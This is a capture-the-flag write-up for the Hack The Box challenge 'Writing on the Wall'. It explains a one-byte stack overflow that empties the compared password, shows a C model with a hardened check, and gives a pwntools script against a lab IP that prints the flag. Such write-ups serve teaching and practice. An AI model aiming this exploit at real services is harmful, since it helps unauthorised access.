HTB-Writing on the Wall
CHALLENGE DESCRIPTION
As you approach a password-protected door, a sense of uncertainty envelops you—no clues, no hints. Yet, just as confusion takes hold, your gaze locks onto cryptic markings adorning the nearby wall. Could this be the elusive password, waiting to unveil the door's secrets?
Solution
Unpacking the archive gives:
➜ challenge l
total 20K
drwxrwxrwx 1 fxe00 fxe00 4.0K Jan 29 2024 .
drwxrwxrwx 1 fxe00 fxe00 4.0K Aug 23 2024 ..
-rwxrwxrwx 1 fxe00 fxe00 25 Jan 29 2024 flag.txt
drwxrwxrwx 1 fxe00 fxe00 4.0K Jan 29 2024 glibc
-rwxrwxrwx 1 fxe00 fxe00 17K Jan 29 2024 writing_on_the_wall
➜ challenge file writing_on_the_wall
writing_on_the_wall: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter ./glibc/ld-linux-x86-64.so.2, BuildID[sha1]=e1865b228b26ed7b4714423d70d822f6f188e63c, for GNU/Linux 3.2.0, not stripped
writing_on_the_wall is a 64-bit dynamically linked executable, so we analyze it with IDA64.
main function:
int __cdecl main(int argc, const char **argv, const char **envp)
{
  char buf[6]; // [rsp+Ah] [rbp-16h] BYREF
  char s2[8]; // [rsp+10h] [rbp-10h] BYREF
  unsigned __int64 v6; // [rsp+18h] [rbp-8h]

  v6 = __readfsqword(0x28u);
  *(_QWORD *)s2 = 0x2073736170743377LL;
  read(0, buf, 7uLL);
  if ( !strcmp(buf, s2) )
    open_door();
  else
    error("You activated the alarm! Troops are coming your way, RUN!\n");
  return 0;
}
Next, the open_door() function:
unsigned __int64 open_door()
{
  char buf; // [rsp+3h] [rbp-Dh] BYREF
  int fd; // [rsp+4h] [rbp-Ch]
  unsigned __int64 v3; // [rsp+8h] [rbp-8h]

  v3 = __readfsqword(0x28u);
  fd = open("./flag.txt", 0);
  if ( fd < 0 )
  {
    perror("\nError opening flag.txt, please contact an Administrator.\n");
    exit(1);
  }
  printf("You managed to open the door! Here is the password for the next one: ");
  while ( read(fd, &buf, 1uLL) > 0 )
    fputc(buf, _bss_start);
  close(fd);
  return v3 - __readfsqword(0x28u);
}
The logic is simple: connect to the remote service and send input; if it equals the string held in s2, the flag is printed. But there is a problem: our input is stored in buf, which is only 6 bytes, yet read(0, buf, 7uLL) reads 7 bytes, so there is a one-byte overflow. From the stack layout, buf sits at rbp-16h and s2 immediately follows it at rbp-10h, so reading 7 bytes into buf overwrites the first byte of s2. Fill buf with zeros and make the seventh byte zero as well; s2 then becomes an empty string, and the final strcmp compares two empty strings, which are equal.
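To make the off-by-one concrete, here is an added C example (not code from the challenge or the writeup) that models main()'s frame as IDA shows it and compares the vulnerable check with a hardened one. The struct layout, the 'A' fill standing in for leftover stack data, the canary_lsb field, and the hardened_check function are all assumptions of this model; the page does not show a fixed binary.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Constructed model of main()'s frame from the decompile: buf (6 bytes at
 * rbp-16h) is immediately followed by s2 (8 bytes at rbp-10h). A struct keeps
 * that adjacency deterministic; a real compiler may order locals differently,
 * so this illustrates the layout rather than reproducing the binary's frame.
 * canary_lsb stands in for the zero low byte of the glibc stack canary at
 * rbp-8, which is what terminates s2 when strcmp() runs past its end. */
struct frame {
    char    buf[6];
    char    s2[8];
    uint8_t canary_lsb;
};

/* Mirrors the vulnerable check: s2 = "w3tpass " (0x2073736170743377 as a
 * little-endian qword), then up to 7 bytes land in the 6-byte buf.
 * Returns 1 when the door would open. */
static int vulnerable_check(const uint8_t *input, size_t len)
{
    struct frame f;
    unsigned char *raw = (unsigned char *)&f;

    memset(&f, 'A', sizeof f);              /* stand-in for leftover stack data */
    memcpy(f.s2, "w3tpass ", 8);
    f.canary_lsb = 0;

    size_t n = len < 7 ? len : 7;           /* read(0, buf, 7uLL) */
    /* Byte-wise copy into the frame, as read() would do: n == 7 writes s2[0]. */
    memcpy(raw + offsetof(struct frame, buf), input, n);
    return strcmp(f.buf, f.s2) == 0;
}

/* Hardened form (assumed, not the project's fix): a buffer large enough for
 * the expected value plus a terminator, a read bounded by sizeof buf - 1,
 * explicit NUL termination, and a length-checked comparison so an empty or
 * truncated input cannot match. */
static int hardened_check(const uint8_t *input, size_t len)
{
    static const char expected[] = "w3tpass ";
    char buf[16] = {0};

    size_t n = len < sizeof buf - 1 ? len : sizeof buf - 1;
    memcpy(buf, input, n);
    buf[n] = '\0';
    return strlen(buf) == sizeof expected - 1
        && memcmp(buf, expected, sizeof expected - 1) == 0;
}

int main(void)
{
    static const uint8_t nuls[7] = {0};     /* the writeup's payload */

    printf("vulnerable, 7 NUL bytes : %d\n", vulnerable_check(nuls, 7));
    /* Even the embedded password fails here: its 7th byte clobbers s2[0]. */
    printf("vulnerable, \"w3tpass\"   : %d\n",
           vulnerable_check((const uint8_t *)"w3tpass", 7));
    printf("hardened,   7 NUL bytes : %d\n", hardened_check(nuls, 7));
    printf("hardened,   \"w3tpass \"  : %d\n",
           hardened_check((const uint8_t *)"w3tpass ", 8));
    return 0;
}
```

The seven-NUL input opens the vulnerable door because the seventh byte zeroes s2[0] and strcmp() then sees two empty strings; the same input is rejected by hardened_check because its length no longer matches the expected value.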
Exploit
import pwn
pwn.context.log_level = 'debug'
pwn.context.os = 'linux'
pwn.context.arch = 'amd64' # i386 amd64
io = pwn.remote('94.237.59.199', 33068)
# io = pwn.process('./writing_on_the_wall')  # local run from the challenge directory
#===========================================================
# EXPLOIT GOES HERE
#===========================================================
# read(0, buf, 7) consumes 7 bytes: 6 fill buf and the 7th zeroes s2[0],
# so strcmp() compares two empty strings. p64(0) sends 8 NUL bytes; the
# program never reads the 8th.
payload = pwn.p64(0x00)
io.send(payload)
io.interactive()
shell:
➜ Writing-on-the-Wall python3 exp.py
[+] Opening connection to 94.237.59.199 on port 33068: Done
[DEBUG] Sent 0x8 bytes:
b'\x00' * 0x8
[*] Switching to interactive mode
[DEBUG] Received 0xd6 bytes:
00000000 1b 5b 32 4a 1b 5b 30 3b 30 48 1b 5b 31 3b 33 36 │·[2J│·[0;│0H·[│1;36│
00000010 6d e3 80 b0 e2 91 a2 20 e2 95 a4 20 e2 84 99 20 │m···│··· │··· │··· │
〰③ ╤ ℙ Å ⅀ ₷
The writing on the wall seems unreadable, can you figure it out?
>> You managed to open the door! Here is the password for the next one: HTB{4n0th3r_br1ck_0n_th3_w4ll}
[*] Got EOF while reading in interactive